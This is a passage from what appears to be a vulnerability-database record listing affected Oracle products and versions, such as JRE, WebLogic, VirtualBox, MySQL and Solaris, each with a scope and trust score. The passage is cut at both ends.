"https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: 